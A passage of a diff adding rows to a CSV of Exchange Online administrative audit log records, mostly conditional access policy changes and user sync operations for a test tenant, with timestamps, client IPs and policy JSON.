+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""09abbdfd-ed23-44ee-a2d9-a627aa1c90f3\"",\""cc15fd57-2c6c-4117-a88c-83b1d56b4bbe\"",\""00000003-0000-0ff1-ce00-000000000000\"",\""00000005-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/6/2020 2:51:09 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-06T02:48:50Z,,,New-Mailbox,"[
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""OrgPartition"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""OrgPartitionDescription"",
+    ""Value"": ""EntityServe Acronyms Tenant""
+  },
+  {
+    ""Name"": ""OrgPartitionOwner"",
+    ""Value"": ""66a88757-258c-4c72-893c-3e8bed4d6899""
+  },
+  {
+    ""Name"": ""DomainController"",
+    ""Value"": ""SN6PR06A07DC001.NAMPR06A007.PROD.OUTLOOK.COM""
+  },
+  {
+    ""Name"": ""Organization"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c""
+  }
+]"
+2020-05-06T17:36:58Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\4fa53e5c-cfa7-4206-8b32-0c555070f202""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ErrorAction"",
+    ""Value"": ""Stop""
+  }
+]"
+2020-05-21T09:12:09Z,NT AUTHORITY\SYSTEM (MSExchangeMigrationWorkflow),,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\009194cf-7935-420a-9f05-1782af9ada42""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-21T06:17:45Z,NT AUTHORITY\SYSTEM (Microsoft.Exchange.Management.ForwardSync),,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\4fa53e5c-cfa7-4206-8b32-0c555070f202""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ErrorAction"",
+    ""Value"": ""Stop""
+  }
+]"
+2020-05-21T06:26:56Z,NT AUTHORITY\SYSTEM (MSExchangeMigrationWorkflow),,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a792cdf5-6148-47eb-85fe-044ee521d534""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-20T21:10:30Z,NT AUTHORITY\SYSTEM (MSExchangeMigrationWorkflow),,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\009194cf-7935-420a-9f05-1782af9ada42""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-20T15:09:23Z,NT AUTHORITY\SYSTEM (MSExchangeMigrationWorkflow),,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\009194cf-7935-420a-9f05-1782af9ada42""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-20T11:15:52Z,NT AUTHORITY\SYSTEM (MSExchangeMigrationWorkflow),,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\f7ed24a4-8fab-4f94-a97f-533604a3453a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-20T12:28:29Z,NT AUTHORITY\SYSTEM (MSExchangeMigrationWorkflow),,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a792cdf5-6148-47eb-85fe-044ee521d534""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-19T13:39:48Z,NT AUTHORITY\SYSTEM (w3wp),52.229.51.154:3633,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""ModifiedDateTime\"":\""2020-05-19T13:31:41.7083504Z\"",\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""ClientTypes\"":{\""Include\"":[{\""ClientTypes\"":[\""Browser\"",\""Native\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:39:48 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T13:37:58Z,NT AUTHORITY\SYSTEM (w3wp),40.114.117.193:50414,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-05-19T13:28:44.6305974Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:37:57 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""2020-05-19T13:34:15.6926286Z""
+  }
+]"
+2020-05-19T13:39:46Z,NT AUTHORITY\SYSTEM (w3wp),40.114.117.193:28421,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""ModifiedDateTime\"":\""2020-05-19T13:31:41.7083504Z\"",\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""ClientTypes\"":{\""Include\"":[{\""ClientTypes\"":[\""Browser\"",\""Native\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:39:46 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T13:36:10Z,NT AUTHORITY\SYSTEM (w3wp),40.114.117.193:50728,New-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Organization"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com""
+  }
+]"
+2020-05-19T13:35:54Z,NT AUTHORITY\SYSTEM (w3wp),40.114.117.193:2143,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-05-19T13:28:44.6305974Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:35:54 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""2020-05-19T13:34:15.6926286Z""
+  }
+]"
+2020-05-19T13:35:24Z,NT AUTHORITY\SYSTEM (w3wp),52.229.51.154:50507,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-05-19T13:28:44.6305974Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:35:24 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""2020-05-19T13:34:15.6926286Z""
+  }
+]"
+2020-05-19T13:34:11Z,NT AUTHORITY\SYSTEM (w3wp),40.114.117.193:51868,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""ModifiedDateTime\"":\""2020-05-19T13:31:41.7083504Z\"",\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""ClientTypes\"":{\""Include\"":[{\""ClientTypes\"":[\""Browser\"",\""Native\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:34:11 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T13:33:47Z,NT AUTHORITY\SYSTEM (w3wp),40.114.117.193:32761,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-05-19T13:28:44.6305974Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:33:47 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""2020-05-19T13:31:42.3802191Z""
+  }
+]"
+2020-05-19T13:33:58Z,NT AUTHORITY\SYSTEM (w3wp),52.229.51.154:28518,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-05-19T13:28:44.6305974Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:33:57 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""2020-05-19T13:31:42.3802191Z""
+  }
+]"
+2020-05-19T13:49:00Z,NT AUTHORITY\SYSTEM (w3wp),40.114.117.193:36829,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-05-19T13:28:44.6305974Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:48:59 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""2020-05-19T13:39:05.0146113Z""
+  }
+]"
+2020-05-19T13:48:08Z,NT AUTHORITY\SYSTEM (w3wp),40.114.117.193:32071,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\3b13ea3c-c733-4eb8-bd19-67d308b2ea04""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""CreatedDateTime\"":\""2020-05-19T13:34:15.2394934Z\"",\""ModifiedDateTime\"":\""2020-05-19T13:39:04.7333386Z\"",\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""None\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""Guests\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""ClientTypes\"":{\""Include\"":[{\""ClientTypes\"":[\""Browser\"",\""Native\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\"",\""RequireCompliantDevice\""]}]}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:48:07 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Yanivsh -CA Test""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T13:48:11Z,NT AUTHORITY\SYSTEM (w3wp),52.229.51.154:30767,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\3b13ea3c-c733-4eb8-bd19-67d308b2ea04""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""CreatedDateTime\"":\""2020-05-19T13:34:15.2394934Z\"",\""ModifiedDateTime\"":\""2020-05-19T13:39:04.7333386Z\"",\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""None\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""Guests\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""ClientTypes\"":{\""Include\"":[{\""ClientTypes\"":[\""Browser\"",\""Native\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\"",\""RequireCompliantDevice\""]}]}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:48:11 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Yanivsh -CA Test""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T13:44:48Z,NT AUTHORITY\SYSTEM (w3wp),40.114.117.193:65087,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\3b13ea3c-c733-4eb8-bd19-67d308b2ea04""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""CreatedDateTime\"":\""2020-05-19T13:34:15.2394934Z\"",\""ModifiedDateTime\"":\""2020-05-19T13:39:04.7333386Z\"",\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""None\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""Guests\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""ClientTypes\"":{\""Include\"":[{\""ClientTypes\"":[\""Browser\"",\""Native\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\"",\""RequireCompliantDevice\""]}]}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:44:48 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Yanivsh -CA Test""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T13:44:53Z,NT AUTHORITY\SYSTEM (w3wp),52.229.51.154:18650,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\3b13ea3c-c733-4eb8-bd19-67d308b2ea04""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""CreatedDateTime\"":\""2020-05-19T13:34:15.2394934Z\"",\""ModifiedDateTime\"":\""2020-05-19T13:39:04.7333386Z\"",\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""None\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""Guests\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""ClientTypes\"":{\""Include\"":[{\""ClientTypes\"":[\""Browser\"",\""Native\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\"",\""RequireCompliantDevice\""]}]}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:44:52 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Yanivsh -CA Test""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T13:49:00Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-05-19T13:28:44.6305974Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:48:59 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""2020-05-19T13:39:05.0146113Z""
+  }
+]"
+2020-05-19T13:48:08Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\3b13ea3c-c733-4eb8-bd19-67d308b2ea04""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""CreatedDateTime\"":\""2020-05-19T13:34:15.2394934Z\"",\""ModifiedDateTime\"":\""2020-05-19T13:39:04.7333386Z\"",\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""None\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""Guests\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""ClientTypes\"":{\""Include\"":[{\""ClientTypes\"":[\""Browser\"",\""Native\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\"",\""RequireCompliantDevice\""]}]}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:48:07 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Yanivsh -CA Test""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T13:48:11Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\3b13ea3c-c733-4eb8-bd19-67d308b2ea04""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""CreatedDateTime\"":\""2020-05-19T13:34:15.2394934Z\"",\""ModifiedDateTime\"":\""2020-05-19T13:39:04.7333386Z\"",\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""None\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""Guests\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""ClientTypes\"":{\""Include\"":[{\""ClientTypes\"":[\""Browser\"",\""Native\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\"",\""RequireCompliantDevice\""]}]}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:48:11 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Yanivsh -CA Test""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T13:44:48Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\3b13ea3c-c733-4eb8-bd19-67d308b2ea04""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""CreatedDateTime\"":\""2020-05-19T13:34:15.2394934Z\"",\""ModifiedDateTime\"":\""2020-05-19T13:39:04.7333386Z\"",\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""None\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""Guests\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""ClientTypes\"":{\""Include\"":[{\""ClientTypes\"":[\""Browser\"",\""Native\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\"",\""RequireCompliantDevice\""]}]}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:44:48 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Yanivsh -CA Test""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T13:44:53Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\3b13ea3c-c733-4eb8-bd19-67d308b2ea04""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""CreatedDateTime\"":\""2020-05-19T13:34:15.2394934Z\"",\""ModifiedDateTime\"":\""2020-05-19T13:39:04.7333386Z\"",\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""None\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""Guests\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""ClientTypes\"":{\""Include\"":[{\""ClientTypes\"":[\""Browser\"",\""Native\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\"",\""RequireCompliantDevice\""]}]}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:44:52 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Yanivsh -CA Test""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T13:33:57Z,NT AUTHORITY\SYSTEM (w3wp),52.229.51.154:3391,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
